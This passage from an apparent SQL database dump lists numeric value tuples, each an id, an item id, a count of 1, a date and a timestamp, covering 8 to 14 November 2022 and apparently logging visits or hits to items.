00:39:10'),(63440,80,1,'2022-11-08','2022-11-08 00:55:35'),(63441,2165,1,'2022-11-08','2022-11-08 03:32:30'),(63442,1596,1,'2022-11-08','2022-11-08 04:30:02'),(63443,1594,1,'2022-11-08','2022-11-08 04:30:21'),(63444,1588,1,'2022-11-08','2022-11-08 08:39:16'),(63445,80,1,'2022-11-08','2022-11-08 08:46:18'),(63446,1606,1,'2022-11-08','2022-11-08 09:28:32'),(63447,80,1,'2022-11-08','2022-11-08 09:28:51'),(63448,1614,1,'2022-11-08','2022-11-08 09:33:57'),(63449,68,1,'2022-11-08','2022-11-08 09:34:17'),(63450,1614,1,'2022-11-08','2022-11-08 09:34:36'),(63451,4703,1,'2022-11-08','2022-11-08 10:11:07'),(63452,1598,1,'2022-11-08','2022-11-08 10:29:29'),(63453,2309,1,'2022-11-08','2022-11-08 10:58:37'),(63454,1614,1,'2022-11-08','2022-11-08 11:44:03'),(63455,1588,1,'2022-11-08','2022-11-08 12:48:33'),(63456,1590,1,'2022-11-08','2022-11-08 12:50:30'),(63457,1588,1,'2022-11-08','2022-11-08 12:50:36'),(63458,1612,1,'2022-11-08','2022-11-08 13:13:18'),(63459,1612,1,'2022-11-08','2022-11-08 13:22:53'),(63460,2769,1,'2022-11-08','2022-11-08 13:23:13'),(63461,2911,1,'2022-11-08','2022-11-08 13:32:13'),(63462,4335,1,'2022-11-08','2022-11-08 13:33:36'),(63463,2971,1,'2022-11-08','2022-11-08 13:45:56'),(63464,1600,1,'2022-11-08','2022-11-08 14:08:41'),(63465,4944,1,'2022-11-08','2022-11-08 14:17:13'),(63466,68,1,'2022-11-08','2022-11-08 14:18:30'),(63467,1726,1,'2022-11-08','2022-11-08 14:49:06'),(63468,570,1,'2022-11-08','2022-11-08 15:38:27'),(63469,4966,1,'2022-11-08','2022-11-08 16:00:15'),(63470,4966,1,'2022-11-08','2022-11-08 16:01:12'),(63471,1544,1,'2022-11-08','2022-11-08 16:44:12'),(63472,1544,1,'2022-11-08','2022-11-08 16:45:32'),(63473,1544,1,'2022-11-08','2022-11-08 16:47:14'),(63474,1544,1,'2022-11-08','2022-11-08 16:51:13'),(63475,570,1,'2022-11-08','2022-11-08 17:34:31'),(63476,1766,1,'2022-11-08','2022-11-08 17:39:02'),(63477,1602,1,'2022-11-08','2022-11-08 19:20:48'),(63478,1596,1,'2022-11-08','2022-11-08 19:48:11'),(63479,1596,1,'2022-11-08','2022-11-08 19:51:21'),(63480,570,1,'2022-11-08','2022-11-08 20:03:10'),(63481,4323,1,'2022-11-08','2022-11-08 20:46:41'),(63482,4457,1,'2022-11-08','2022-11-08 20:54:10'),(63483,2704,1,'2022-11-08','2022-11-08 21:21:05'),(63484,3087,1,'2022-11-08','2022-11-08 22:04:10'),(63485,1602,1,'2022-11-09','2022-11-09 03:58:23'),(63486,5163,1,'2022-11-09','2022-11-09 04:35:00'),(63487,68,1,'2022-11-09','2022-11-09 04:35:20'),(63488,5163,1,'2022-11-09','2022-11-09 04:35:30'),(63489,74,1,'2022-11-09','2022-11-09 04:35:52'),(63490,5163,1,'2022-11-09','2022-11-09 04:36:04'),(63491,80,1,'2022-11-09','2022-11-09 05:21:58'),(63492,4651,1,'2022-11-09','2022-11-09 05:51:14'),(63493,5163,1,'2022-11-09','2022-11-09 06:13:13'),(63494,4776,1,'2022-11-09','2022-11-09 06:23:59'),(63495,76,1,'2022-11-09','2022-11-09 06:31:00'),(63496,76,1,'2022-11-09','2022-11-09 06:31:06'),(63497,76,1,'2022-11-09','2022-11-09 06:32:59'),(63498,4645,1,'2022-11-09','2022-11-09 06:36:12'),(63499,4657,1,'2022-11-09','2022-11-09 06:58:32'),(63500,1594,1,'2022-11-09','2022-11-09 07:20:55'),(63501,1594,1,'2022-11-09','2022-11-09 07:20:56'),(63502,1594,1,'2022-11-09','2022-11-09 07:21:00'),(63503,4654,1,'2022-11-09','2022-11-09 07:21:02'),(63504,4660,1,'2022-11-09','2022-11-09 07:43:34'),(63505,4648,1,'2022-11-09','2022-11-09 08:03:43'),(63506,4663,1,'2022-11-09','2022-11-09 08:19:32'),(63507,3102,1,'2022-11-09','2022-11-09 08:44:49'),(63508,1544,1,'2022-11-09','2022-11-09 11:33:54'),(63509,87,1,'2022-11-09','2022-11-09 11:49:05'),(63510,5163,1,'2022-11-09','2022-11-09 12:25:55'),(63511,1745,1,'2022-11-09','2022-11-09 12:45:49'),(63512,1745,1,'2022-11-09','2022-11-09 12:46:29'),(63513,1600,1,'2022-11-09','2022-11-09 12:50:00'),(63514,4966,1,'2022-11-09','2022-11-09 13:31:34'),(63515,1870,1,'2022-11-09','2022-11-09 14:18:39'),(63516,84,1,'2022-11-09','2022-11-09 14:19:37'),(63517,89,1,'2022-11-09','2022-11-09 14:20:14'),(63518,1608,1,'2022-11-09','2022-11-09 14:20:59'),(63519,5163,1,'2022-11-09','2022-11-09 14:51:38'),(63520,5080,1,'2022-11-09','2022-11-09 15:06:42'),(63521,2658,1,'2022-11-09','2022-11-09 15:48:53'),(63522,2658,1,'2022-11-09','2022-11-09 15:49:45'),(63523,2658,1,'2022-11-09','2022-11-09 15:50:37'),(63524,1544,1,'2022-11-09','2022-11-09 16:30:28'),(63525,2658,1,'2022-11-09','2022-11-09 17:03:20'),(63526,1612,1,'2022-11-09','2022-11-09 17:14:44'),(63527,3764,1,'2022-11-09','2022-11-09 17:36:10'),(63528,3764,1,'2022-11-09','2022-11-09 17:46:59'),(63529,4911,1,'2022-11-09','2022-11-09 19:36:58'),(63530,4762,1,'2022-11-09','2022-11-09 20:22:15'),(63531,472,1,'2022-11-09','2022-11-09 21:53:15'),(63532,4329,1,'2022-11-09','2022-11-09 22:08:33'),(63533,4412,1,'2022-11-09','2022-11-09 23:14:44'),(63534,68,1,'2022-11-09','2022-11-09 23:29:19'),(63535,1586,1,'2022-11-10','2022-11-10 00:40:21'),(63536,1596,1,'2022-11-10','2022-11-10 01:44:49'),(63537,472,1,'2022-11-10','2022-11-10 01:56:29'),(63538,4373,1,'2022-11-10','2022-11-10 03:12:42'),(63539,3060,1,'2022-11-10','2022-11-10 03:13:22'),(63540,68,1,'2022-11-10','2022-11-10 03:23:09'),(63541,2813,1,'2022-11-10','2022-11-10 03:24:53'),(63542,570,1,'2022-11-10','2022-11-10 03:25:02'),(63543,2159,1,'2022-11-10','2022-11-10 03:25:11'),(63544,1544,1,'2022-11-10','2022-11-10 03:25:17'),(63545,2297,1,'2022-11-10','2022-11-10 03:25:18'),(63546,1596,1,'2022-11-10','2022-11-10 03:25:21'),(63547,4944,1,'2022-11-10','2022-11-10 03:25:26'),(63548,3664,1,'2022-11-10','2022-11-10 03:25:28'),(63549,72,1,'2022-11-10','2022-11-10 03:25:30'),(63550,108,1,'2022-11-10','2022-11-10 03:38:08'),(63551,1544,1,'2022-11-10','2022-11-10 03:46:24'),(63552,4938,1,'2022-11-10','2022-11-10 03:57:06'),(63553,3087,1,'2022-11-10','2022-11-10 04:11:52'),(63554,1608,1,'2022-11-10','2022-11-10 04:27:43'),(63555,2813,1,'2022-11-10','2022-11-10 04:54:51'),(63556,2159,1,'2022-11-10','2022-11-10 04:54:56'),(63557,570,1,'2022-11-10','2022-11-10 04:56:06'),(63558,4944,1,'2022-11-10','2022-11-10 04:57:14'),(63559,3764,1,'2022-11-10','2022-11-10 05:16:48'),(63560,4776,1,'2022-11-10','2022-11-10 05:16:51'),(63561,4524,1,'2022-11-10','2022-11-10 05:16:52'),(63562,4529,1,'2022-11-10','2022-11-10 05:16:57'),(63563,484,1,'2022-11-10','2022-11-10 05:21:16'),(63564,80,1,'2022-11-10','2022-11-10 07:59:11'),(63565,4416,1,'2022-11-10','2022-11-10 08:03:54'),(63566,3714,1,'2022-11-10','2022-11-10 08:26:42'),(63567,1614,1,'2022-11-10','2022-11-10 09:45:26'),(63568,1596,1,'2022-11-10','2022-11-10 11:53:29'),(63569,108,1,'2022-11-10','2022-11-10 12:06:09'),(63570,108,1,'2022-11-10','2022-11-10 12:26:07'),(63571,472,1,'2022-11-10','2022-11-10 12:27:11'),(63572,108,1,'2022-11-10','2022-11-10 14:07:32'),(63573,4762,1,'2022-11-10','2022-11-10 14:09:51'),(63574,4762,1,'2022-11-10','2022-11-10 14:23:51'),(63575,4976,1,'2022-11-10','2022-11-10 14:29:44'),(63576,4976,1,'2022-11-10','2022-11-10 14:30:50'),(63577,4976,1,'2022-11-10','2022-11-10 14:31:47'),(63578,1728,1,'2022-11-10','2022-11-10 14:36:02'),(63579,91,1,'2022-11-10','2022-11-10 14:36:33'),(63580,3781,1,'2022-11-10','2022-11-10 15:00:17'),(63581,1709,1,'2022-11-10','2022-11-10 15:22:14'),(63582,3271,1,'2022-11-10','2022-11-10 15:36:40'),(63583,4608,1,'2022-11-10','2022-11-10 15:42:58'),(63584,84,1,'2022-11-10','2022-11-10 15:52:03'),(63585,467,1,'2022-11-10','2022-11-10 15:53:21'),(63586,4608,1,'2022-11-10','2022-11-10 15:53:46'),(63587,4938,1,'2022-11-10','2022-11-10 15:53:49'),(63588,1596,1,'2022-11-10','2022-11-10 15:53:51'),(63589,72,1,'2022-11-10','2022-11-10 15:53:56'),(63590,4759,1,'2022-11-10','2022-11-10 15:54:17'),(63591,3083,1,'2022-11-10','2022-11-10 16:11:56'),(63592,2704,1,'2022-11-10','2022-11-10 16:12:37'),(63593,4776,1,'2022-11-10','2022-11-10 16:22:56'),(63594,3102,1,'2022-11-10','2022-11-10 16:25:06'),(63595,3102,1,'2022-11-10','2022-11-10 16:38:04'),(63596,4368,1,'2022-11-10','2022-11-10 16:39:16'),(63597,4963,1,'2022-11-10','2022-11-10 17:02:09'),(63598,4762,1,'2022-11-10','2022-11-10 17:21:13'),(63599,3107,1,'2022-11-10','2022-11-10 17:22:11'),(63600,4706,1,'2022-11-10','2022-11-10 17:23:39'),(63601,1544,1,'2022-11-10','2022-11-10 17:23:43'),(63602,4608,1,'2022-11-10','2022-11-10 17:28:43'),(63603,4762,1,'2022-11-10','2022-11-10 17:34:28'),(63604,3069,1,'2022-11-10','2022-11-10 17:56:50'),(63605,472,1,'2022-11-10','2022-11-10 17:57:30'),(63606,4368,1,'2022-11-10','2022-11-10 18:01:55'),(63607,1544,1,'2022-11-10','2022-11-10 18:52:46'),(63608,3664,1,'2022-11-10','2022-11-10 18:52:47'),(63609,1772,1,'2022-11-10','2022-11-10 19:04:33'),(63610,1772,1,'2022-11-10','2022-11-10 19:06:55'),(63611,1772,1,'2022-11-10','2022-11-10 19:07:14'),(63612,1772,1,'2022-11-10','2022-11-10 19:09:03'),(63613,1772,1,'2022-11-10','2022-11-10 19:09:08'),(63614,4762,1,'2022-11-10','2022-11-10 19:09:10'),(63615,1772,1,'2022-11-10','2022-11-10 19:11:27'),(63616,76,1,'2022-11-10','2022-11-10 19:11:39'),(63617,1772,1,'2022-11-10','2022-11-10 19:12:08'),(63618,4776,1,'2022-11-10','2022-11-10 19:12:08'),(63619,1772,1,'2022-11-10','2022-11-10 19:12:23'),(63620,335,1,'2022-11-10','2022-11-10 20:03:43'),(63621,1745,1,'2022-11-10','2022-11-10 20:28:57'),(63622,3482,1,'2022-11-10','2022-11-10 20:47:12'),(63623,4938,1,'2022-11-10','2022-11-10 21:31:12'),(63624,4938,1,'2022-11-10','2022-11-10 21:31:18'),(63625,1870,1,'2022-11-10','2022-11-10 21:46:19'),(63626,1709,1,'2022-11-10','2022-11-10 21:49:33'),(63627,108,1,'2022-11-10','2022-11-10 23:04:15'),(63628,108,1,'2022-11-10','2022-11-10 23:04:16'),(63629,4759,1,'2022-11-11','2022-11-11 00:07:20'),(63630,74,1,'2022-11-11','2022-11-11 00:10:01'),(63631,2904,1,'2022-11-11','2022-11-11 00:12:10'),(63632,74,1,'2022-11-11','2022-11-11 00:14:09'),(63633,4759,1,'2022-11-11','2022-11-11 00:14:15'),(63634,4759,1,'2022-11-11','2022-11-11 00:14:30'),(63635,5137,1,'2022-11-11','2022-11-11 00:15:54'),(63636,4762,1,'2022-11-11','2022-11-11 01:48:02'),(63637,2904,1,'2022-11-11','2022-11-11 01:48:50'),(63638,4762,1,'2022-11-11','2022-11-11 01:49:05'),(63639,1584,1,'2022-11-11','2022-11-11 01:52:39'),(63640,4759,1,'2022-11-11','2022-11-11 01:52:45'),(63641,1586,1,'2022-11-11','2022-11-11 02:12:25'),(63642,4938,1,'2022-11-11','2022-11-11 02:37:35'),(63643,2252,1,'2022-11-11','2022-11-11 02:56:00'),(63644,4759,1,'2022-11-11','2022-11-11 03:22:17'),(63645,4706,1,'2022-11-11','2022-11-11 03:22:30'),(63646,4911,1,'2022-11-11','2022-11-11 03:26:48'),(63647,4489,1,'2022-11-11','2022-11-11 03:40:28'),(63648,3290,1,'2022-11-11','2022-11-11 04:35:15'),(63649,4779,1,'2022-11-11','2022-11-11 04:42:34'),(63650,1602,1,'2022-11-11','2022-11-11 05:55:41'),(63651,1602,1,'2022-11-11','2022-11-11 05:55:51'),(63652,4762,1,'2022-11-11','2022-11-11 05:59:07'),(63653,335,1,'2022-11-11','2022-11-11 06:00:19'),(63654,4357,1,'2022-11-11','2022-11-11 06:05:41'),(63655,335,1,'2022-11-11','2022-11-11 06:45:16'),(63656,1602,1,'2022-11-11','2022-11-11 06:55:51'),(63657,1602,1,'2022-11-11','2022-11-11 06:55:59'),(63658,68,1,'2022-11-11','2022-11-11 07:17:47'),(63659,2154,1,'2022-11-11','2022-11-11 07:34:56'),(63660,2154,1,'2022-11-11','2022-11-11 07:35:15'),(63661,2154,1,'2022-11-11','2022-11-11 07:35:31'),(63662,5163,1,'2022-11-11','2022-11-11 07:49:20'),(63663,1544,1,'2022-11-11','2022-11-11 09:29:22'),(63664,1602,1,'2022-11-11','2022-11-11 09:29:53'),(63665,1544,1,'2022-11-11','2022-11-11 09:30:01'),(63666,1602,1,'2022-11-11','2022-11-11 09:30:27'),(63667,1544,1,'2022-11-11','2022-11-11 09:30:28'),(63668,3764,1,'2022-11-11','2022-11-11 09:34:30'),(63669,4878,1,'2022-11-11','2022-11-11 10:12:33'),(63670,1592,1,'2022-11-11','2022-11-11 10:22:47'),(63671,1592,1,'2022-11-11','2022-11-11 10:22:48'),(63672,3764,1,'2022-11-11','2022-11-11 10:42:05'),(63673,1544,1,'2022-11-11','2022-11-11 12:04:43'),(63674,1544,1,'2022-11-11','2022-11-11 12:07:14'),(63675,5062,1,'2022-11-11','2022-11-11 13:36:02'),(63676,4706,1,'2022-11-11','2022-11-11 13:57:29'),(63677,2911,1,'2022-11-11','2022-11-11 13:57:48'),(63678,4400,1,'2022-11-11','2022-11-11 14:06:32'),(63679,3030,1,'2022-11-11','2022-11-11 14:15:16'),(63680,3063,1,'2022-11-11','2022-11-11 14:24:24'),(63681,4706,1,'2022-11-11','2022-11-11 14:43:18'),(63682,4911,1,'2022-11-11','2022-11-11 15:09:17'),(63683,4357,1,'2022-11-11','2022-11-11 15:27:20'),(63684,3691,1,'2022-11-11','2022-11-11 16:24:47'),(63685,3691,1,'2022-11-11','2022-11-11 16:42:54'),(63686,3265,1,'2022-11-11','2022-11-11 17:05:00'),(63687,3107,1,'2022-11-11','2022-11-11 17:10:11'),(63688,5163,1,'2022-11-11','2022-11-11 17:13:00'),(63689,68,1,'2022-11-11','2022-11-11 17:13:16'),(63690,5163,1,'2022-11-11','2022-11-11 17:13:25'),(63691,4400,1,'2022-11-11','2022-11-11 17:15:51'),(63692,3691,1,'2022-11-11','2022-11-11 17:23:36'),(63693,1592,1,'2022-11-11','2022-11-11 17:51:47'),(63694,1594,1,'2022-11-11','2022-11-11 19:00:38'),(63695,3102,1,'2022-11-11','2022-11-11 19:01:23'),(63696,1604,1,'2022-11-11','2022-11-11 19:19:34'),(63697,80,1,'2022-11-11','2022-11-11 19:30:16'),(63698,4930,1,'2022-11-11','2022-11-11 19:52:06'),(63699,4944,1,'2022-11-11','2022-11-11 19:54:18'),(63700,4930,1,'2022-11-11','2022-11-11 19:57:06'),(63701,4966,1,'2022-11-11','2022-11-11 19:57:17'),(63702,4930,1,'2022-11-11','2022-11-11 19:58:41'),(63703,4963,1,'2022-11-11','2022-11-11 19:58:48'),(63704,4930,1,'2022-11-11','2022-11-11 20:01:30'),(63705,4960,1,'2022-11-11','2022-11-11 20:01:35'),(63706,4950,1,'2022-11-11','2022-11-11 20:04:19'),(63707,4930,1,'2022-11-11','2022-11-11 20:05:12'),(63708,4941,1,'2022-11-11','2022-11-11 20:05:17'),(63709,1594,1,'2022-11-11','2022-11-11 20:05:42'),(63710,3102,1,'2022-11-11','2022-11-11 20:49:06'),(63711,1588,1,'2022-11-11','2022-11-11 22:46:56'),(63712,4706,1,'2022-11-12','2022-11-12 01:01:05'),(63713,3253,1,'2022-11-12','2022-11-12 01:45:52'),(63714,4960,1,'2022-11-12','2022-11-12 02:57:32'),(63715,1728,1,'2022-11-12','2022-11-12 03:13:16'),(63716,473,1,'2022-11-12','2022-11-12 03:24:19'),(63717,473,1,'2022-11-12','2022-11-12 03:25:13'),(63718,473,1,'2022-11-12','2022-11-12 03:25:46'),(63719,4966,1,'2022-11-12','2022-11-12 04:06:13'),(63720,1600,1,'2022-11-12','2022-11-12 04:18:04'),(63721,4960,1,'2022-11-12','2022-11-12 04:29:53'),(63722,3060,1,'2022-11-12','2022-11-12 04:41:22'),(63723,3691,1,'2022-11-12','2022-11-12 04:58:23'),(63724,4382,1,'2022-11-12','2022-11-12 05:33:02'),(63725,4520,1,'2022-11-12','2022-11-12 06:01:32'),(63726,1751,1,'2022-11-12','2022-11-12 06:26:30'),(63727,1780,1,'2022-11-12','2022-11-12 06:35:16'),(63728,2911,1,'2022-11-12','2022-11-12 06:50:32'),(63729,3313,1,'2022-11-12','2022-11-12 07:06:52'),(63730,4911,1,'2022-11-12','2022-11-12 07:07:15'),(63731,4911,1,'2022-11-12','2022-11-12 07:07:45'),(63732,3691,1,'2022-11-12','2022-11-12 07:18:02'),(63733,4911,1,'2022-11-12','2022-11-12 07:44:57'),(63734,3066,1,'2022-11-12','2022-11-12 07:48:02'),(63735,3691,1,'2022-11-12','2022-11-12 07:54:42'),(63736,80,1,'2022-11-12','2022-11-12 07:57:39'),(63737,89,1,'2022-11-12','2022-11-12 07:58:34'),(63738,1600,1,'2022-11-12','2022-11-12 07:58:43'),(63739,3691,1,'2022-11-12','2022-11-12 08:06:18'),(63740,1588,1,'2022-11-12','2022-11-12 08:08:01'),(63741,80,1,'2022-11-12','2022-11-12 08:10:19'),(63742,4520,1,'2022-11-12','2022-11-12 08:11:54'),(63743,3691,1,'2022-11-12','2022-11-12 08:24:59'),(63744,4382,1,'2022-11-12','2022-11-12 08:32:23'),(63745,4966,1,'2022-11-12','2022-11-12 08:55:30'),(63746,4966,1,'2022-11-12','2022-11-12 08:59:11'),(63747,3664,1,'2022-11-12','2022-11-12 09:03:38'),(63748,1594,1,'2022-11-12','2022-11-12 09:46:20'),(63749,5163,1,'2022-11-12','2022-11-12 09:47:02'),(63750,1604,1,'2022-11-12','2022-11-12 10:21:01'),(63751,1604,1,'2022-11-12','2022-11-12 10:21:06'),(63752,1592,1,'2022-11-12','2022-11-12 11:06:43'),(63753,4691,1,'2022-11-12','2022-11-12 11:46:56'),(63754,4436,1,'2022-11-12','2022-11-12 12:41:09'),(63755,1598,1,'2022-11-12','2022-11-12 13:13:03'),(63756,2297,1,'2022-11-12','2022-11-12 13:20:06'),(63757,4911,1,'2022-11-12','2022-11-12 15:35:35'),(63758,89,1,'2022-11-12','2022-11-12 16:10:05'),(63759,89,1,'2022-11-12','2022-11-12 16:14:06'),(63760,1544,1,'2022-11-12','2022-11-12 16:19:29'),(63761,3691,1,'2022-11-12','2022-11-12 16:36:50'),(63762,1586,1,'2022-11-12','2022-11-12 17:15:24'),(63763,1600,1,'2022-11-12','2022-11-12 17:32:53'),(63764,1602,1,'2022-11-12','2022-11-12 17:51:40'),(63765,1600,1,'2022-11-12','2022-11-12 18:16:58'),(63766,1751,1,'2022-11-12','2022-11-12 18:18:36'),(63767,3680,1,'2022-11-12','2022-11-12 18:30:31'),(63768,4911,1,'2022-11-12','2022-11-12 19:28:23'),(63769,4779,1,'2022-11-12','2022-11-12 19:40:02'),(63770,3030,1,'2022-11-12','2022-11-12 19:53:02'),(63771,4416,1,'2022-11-12','2022-11-12 20:45:40'),(63772,4966,1,'2022-11-12','2022-11-12 20:49:39'),(63773,4416,1,'2022-11-12','2022-11-12 21:36:01'),(63774,5131,1,'2022-11-12','2022-11-12 21:47:30'),(63775,5131,1,'2022-11-12','2022-11-12 21:48:09'),(63776,5131,1,'2022-11-12','2022-11-12 21:49:05'),(63777,5131,1,'2022-11-12','2022-11-12 21:50:13'),(63778,5131,1,'2022-11-12','2022-11-12 21:50:54'),(63779,5131,1,'2022-11-12','2022-11-12 21:51:33'),(63780,1722,1,'2022-11-13','2022-11-13 01:06:53'),(63781,1722,1,'2022-11-13','2022-11-13 01:07:09'),(63782,1544,1,'2022-11-13','2022-11-13 02:06:55'),(63783,467,1,'2022-11-13','2022-11-13 02:52:07'),(63784,1544,1,'2022-11-13','2022-11-13 04:05:46'),(63785,1600,1,'2022-11-13','2022-11-13 04:22:04'),(63786,3269,1,'2022-11-13','2022-11-13 04:23:50'),(63787,2309,1,'2022-11-13','2022-11-13 04:39:49'),(63788,1726,1,'2022-11-13','2022-11-13 04:50:51'),(63789,3006,1,'2022-11-13','2022-11-13 04:51:19'),(63790,2309,1,'2022-11-13','2022-11-13 05:26:44'),(63791,3269,1,'2022-11-13','2022-11-13 06:01:29'),(63792,3680,1,'2022-11-13','2022-11-13 06:14:57'),(63793,3680,1,'2022-11-13','2022-11-13 06:32:45'),(63794,5062,1,'2022-11-13','2022-11-13 06:34:01'),(63795,5062,1,'2022-11-13','2022-11-13 06:34:04'),(63796,4489,1,'2022-11-13','2022-11-13 06:51:26'),(63797,4911,1,'2022-11-13','2022-11-13 06:55:28'),(63798,2993,1,'2022-11-13','2022-11-13 07:08:03'),(63799,4489,1,'2022-11-13','2022-11-13 07:32:03'),(63800,3030,1,'2022-11-13','2022-11-13 07:44:42'),(63801,1544,1,'2022-11-13','2022-11-13 07:52:25'),(63802,1544,1,'2022-11-13','2022-11-13 07:52:37'),(63803,5062,1,'2022-11-13','2022-11-13 08:57:26'),(63804,3030,1,'2022-11-13','2022-11-13 10:44:53'),(63805,1600,1,'2022-11-13','2022-11-13 12:16:13'),(63806,467,1,'2022-11-13','2022-11-13 12:43:56'),(63807,1608,1,'2022-11-13','2022-11-13 13:01:10'),(63808,5062,1,'2022-11-13','2022-11-13 13:13:16'),(63809,2309,1,'2022-11-13','2022-11-13 13:45:42'),(63810,1582,1,'2022-11-13','2022-11-13 14:24:44'),(63811,4768,1,'2022-11-13','2022-11-13 14:45:22'),(63812,4412,1,'2022-11-13','2022-11-13 15:25:00'),(63813,4911,1,'2022-11-13','2022-11-13 15:44:52'),(63814,68,1,'2022-11-13','2022-11-13 17:48:17'),(63815,1594,1,'2022-11-13','2022-11-13 18:28:33'),(63816,4436,1,'2022-11-13','2022-11-13 18:29:23'),(63817,5163,1,'2022-11-13','2022-11-13 18:37:24'),(63818,5163,1,'2022-11-13','2022-11-13 18:38:10'),(63819,5033,1,'2022-11-13','2022-11-13 18:41:10'),(63820,1726,1,'2022-11-13','2022-11-13 18:49:52'),(63821,4963,1,'2022-11-13','2022-11-13 20:14:40'),(63822,472,1,'2022-11-13','2022-11-13 20:18:11'),(63823,3102,1,'2022-11-13','2022-11-13 20:22:16'),(63824,80,1,'2022-11-13','2022-11-13 20:26:27'),(63825,1594,1,'2022-11-13','2022-11-13 20:30:38'),(63826,3764,1,'2022-11-13','2022-11-13 20:34:32'),(63827,1600,1,'2022-11-13','2022-11-13 20:40:17'),(63828,2769,1,'2022-11-13','2022-11-13 20:50:03'),(63829,5037,1,'2022-11-13','2022-11-13 20:51:48'),(63830,3724,1,'2022-11-13','2022-11-13 20:59:13'),(63831,469,1,'2022-11-13','2022-11-13 21:07:16'),(63832,1606,1,'2022-11-13','2022-11-13 21:15:28'),(63833,1606,1,'2022-11-13','2022-11-13 21:15:32'),(63834,4960,1,'2022-11-13','2022-11-13 21:23:40'),(63835,2809,1,'2022-11-13','2022-11-13 21:31:48'),(63836,4391,1,'2022-11-13','2022-11-13 21:35:04'),(63837,4688,1,'2022-11-13','2022-11-13 21:40:02'),(63838,4685,1,'2022-11-13','2022-11-13 21:48:11'),(63839,4776,1,'2022-11-13','2022-11-13 22:04:32'),(63840,3102,1,'2022-11-13','2022-11-13 22:05:51'),(63841,3102,1,'2022-11-13','2022-11-13 22:06:03'),(63842,3102,1,'2022-11-13','2022-11-13 22:06:15'),(63843,1544,1,'2022-11-13','2022-11-13 22:07:36'),(63844,1594,1,'2022-11-13','2022-11-13 22:14:48'),(63845,469,1,'2022-11-13','2022-11-13 22:44:38'),(63846,2558,1,'2022-11-13','2022-11-13 22:51:44'),(63847,4874,1,'2022-11-13','2022-11-13 23:05:39'),(63848,1582,1,'2022-11-13','2022-11-13 23:34:41'),(63849,4674,1,'2022-11-13','2022-11-13 23:44:34'),(63850,3102,1,'2022-11-14','2022-11-14 02:20:26'),(63851,4436,1,'2022-11-14','2022-11-14 03:02:58'),(63852,4612,1,'2022-11-14','2022-11-14 03:29:35'),(63853,72,1,'2022-11-14','2022-11-14 03:56:10'),(63854,3764,1,'2022-11-14','2022-11-14 04:29:32'),(63855,4911,1,'2022-11-14','2022-11-14 04:44:31'),(63856,1600,1,'2022-11-14','2022-11-14 06:06:13'),(63857,4960,1,'2022-11-14','2022-11-14 06:13:13'),(63858,3691,1,'2022-11-14','2022-11-14 06:21:58'),(63859,1588,1,'2022-11-14','2022-11-14 06:40:39'),(63860,1586,1,'2022-11-14','2022-11-14 06:42:45'),(63861,1598,1,'2022-11-14','2022-11-14 06:49:38'),(63862,1610,1,'2022-11-14','2022-11-14 07:06:02'),(63863,1610,1,'2022-11-14','2022-11-14 07:06:04'),(63864,5140,1,'2022-11-14','2022-11-14 07:08:54'),(63865,1606,1,'2022-11-14','2022-11-14 07:14:37'),(63866,4335,1,'2022-11-14','2022-11-14 07:22:54'),(63867,5163,1,'2022-11-14','2022-11-14 07:32:16'),(63868,5163,1,'2022-11-14','2022-11-14 07:32:28'),(63869,3307,1,'2022-11-14','2022-11-14 07:35:25'),(63870,3083,1,'2022-11-14','2022-11-14 07:39:45'),(63871,4454,1,'2022-11-14','2022-11-14 07:50:57'),(63872,4323,1,'2022-11-14','2022-11-14 07:53:38'),(63873,1870,1,'2022-11-14','2022-11-14 08:01:05'),(63874,1610,1,'2022-11-14','2022-11-14 08:04:45'),(63875,4950,1,'2022-11-14','2022-11-14 08:09:34'),(63876,3313,1,'2022-11-14','2022-11-14 08:14:27'),(63877,2617,1,'2022-11-14','2022-11-14 08:17:12'),(63878,1604,1,'2022-11-14','2022-11-14 08:21:11'),(63879,3714,1,'2022-11-14','2022-11-14 08:25:26'),(63880,1722,1,'2022-11-14','2022-11-14 08:32:55'),(63881,4703,1,'2022-11-14','2022-11-14 08:45:35'),(63882,89,1,'2022-11-14','2022-11-14 08:52:48'),(63883,89,1,'2022-11-14','2022-11-14 08:53:15'),(63884,76,1,'2022-11-14','2022-11-14 08:53:47'),(63885,2775,1,'2022-11-14','2022-11-14 08:59:39'),(63886,2419,1,'2022-11-14','2022-11-14 09:16:29'),(63887,91,1,'2022-11-14','2022-11-14 09:25:22'),(63888,3781,1,'2022-11-14','2022-11-14 09:27:29'),(63889,3102,1,'2022-11-14','2022-11-14 09:32:46'),(63890,3752,1,'2022-11-14','2022-11-14 09:35:34'),(63891,1602,1,'2022-11-14','2022-11-14 09:40:20'),(63892,3030,1,'2022-11-14','2022-11-14 09:42:19'),(63893,3030,1,'2022-11-14','2022-11-14 09:43:23'),(63894,4341,1,'2022-11-14','2022-11-14 09:44:04'),(63895,1774,1,'2022-11-14','2022-11-14 10:02:40'),(63896,4348,1,'2022-11-14','2022-11-14 10:04:47'),(63897,2419,1,'2022-11-14','2022-11-14 10:06:46'),(63898,3023,1,'2022-11-14','2022-11-14 10:14:33'),(63899,4703,1,'2022-11-14','2022-11-14 10:14:43'),(63900,3083,1,'2022-11-14','2022-11-14 10:15:16'),(63901,468,1,'2022-11-14','2022-11-14 10:41:16'),(63902,1722,1,'2022-11-14','2022-11-14 10:41:48'),(63903,3023,1,'2022-11-14','2022-11-14 10:44:48'),(63904,1598,1,'2022-11-14','2022-11-14 10:47:22'),(63905,4323,1,'2022-11-14','2022-11-14 10:49:59'),(63906,3023,1,'2022-11-14','2022-11-14 11:17:36'),(63907,3781,1,'2022-11-14','2022-11-14 11:27:17'),(63908,3287,1,'2022-11-14','2022-11-14 11:57:48'),(63909,80,1,'2022-11-14','2022-11-14 12:02:30'),(63910,1608,1,'2022-11-14','2022-11-14 12:02:58'),(63911,80,1,'2022-11-14','2022-11-14 12:06:55'),(63912,1608,1,'2022-11-14','2022-11-14 12:21:39'),(63913,1703,1,'2022-11-14','2022-11-14 12:35:20'),(63914,1711,1,'2022-11-14','2022-11-14 12:48:28'),(63915,1711,1,'2022-11-14','2022-11-14 12:50:26'),(63916,1711,1,'2022-11-14','2022-11-14 12:50:42'),(63917,1711,1,'2022-11-14','2022-11-14 12:51:06'),(63918,1745,1,'2022-11-14','2022-11-14 13:18:57'),(63919,1745,1,'2022-11-14','2022-11-14 13:20:16'),(63920,1745,1,'2022-11-14','2022-11-14 13:20:45'),(63921,2248,1,'2022-11-14','2022-11-14 13:38:39'),(63922,474,1,'2022-11-14','2022-11-14 13:47:43'),(63923,473,1,'2022-11-14','2022-11-14 13:48:36'),(63924,487,1,'2022-11-14','2022-11-14 13:50:01'),(63925,4776,1,'2022-11-14','2022-11-14 